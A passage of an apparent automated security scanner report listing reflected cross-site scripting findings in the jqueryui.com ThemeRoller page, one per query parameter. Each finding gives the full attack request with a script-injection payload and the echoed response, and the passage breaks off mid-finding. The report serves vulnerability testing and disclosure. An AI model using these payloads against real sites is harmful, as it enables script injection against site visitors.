HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B1000088db2"><script>alert(1)</script>4192bd9f2a0&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=1
...[SNIP]...

2.64. http://jqueryui.com/themeroller/ [fcHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 316fc"><script>alert(1)</script>934e76f5e was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF316fc"><script>alert(1)</script>934e76f5e&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120316

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF316fc"><script>alert(1)</script>934e76f5e&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefa
...[SNIP]...

2.65. http://jqueryui.com/themeroller/ [fcHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9b5e"><script>alert(1)</script>d56abac4e9f was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333f9b5e"><script>alert(1)</script>d56abac4e9f&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333f9b5e"><script>alert(1)</script>d56abac4e9f&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_fl
...[SNIP]...

2.66. http://jqueryui.com/themeroller/ [fcHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5c4d"><script>alert(1)</script>6643b1f4f9e was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFFf5c4d"><script>alert(1)</script>6643b1f4f9e&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
OpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFFf5c4d"><script>alert(1)</script>6643b1f4f9e&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHig
...[SNIP]...

2.67. http://jqueryui.com/themeroller/ [ffDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72e03"><script>alert(1)</script>652973ad3a was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif72e03"><script>alert(1)</script>652973ad3a&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120319

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif72e03"><script>alert(1)</script>652973ad3a&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorC
...[SNIP]...

2.68. http://jqueryui.com/themeroller/ [fsDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51e1d"><script>alert(1)</script>b18d92c30eb was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%51e1d"><script>alert(1)</script>b18d92c30eb&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120320

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%51e1d"><script>alert(1)</script>b18d92c30eb&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent
...[SNIP]...

2.69. http://jqueryui.com/themeroller/ [fwDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4e74"><script>alert(1)</script>2a56f0acf06 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bolde4e74"><script>alert(1)</script>2a56f0acf06&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120257

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bolde4e74"><script>alert(1)</script>2a56f0acf06&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&b
...[SNIP]...

2.70. http://jqueryui.com/themeroller/ [iconColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f91a5"><script>alert(1)</script>c8880d7a410 was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CCf91a5"><script>alert(1)</script>c8880d7a410&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CCf91a5"><script>alert(1)</script>c8880d7a410&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01
...[SNIP]...

2.71. http://jqueryui.com/themeroller/ [iconColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73e9d"><script>alert(1)</script>ab4376d587b was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=66666673e9d"><script>alert(1)</script>ab4376d587b&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
erColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=66666673e9d"><script>alert(1)</script>ab4376d587b&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_s
...[SNIP]...

2.72. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c86ff"><script>alert(1)</script>44c93a3107d was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFFc86ff"><script>alert(1)</script>44c93a3107d&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:47 GMT
Content-Type: text/html
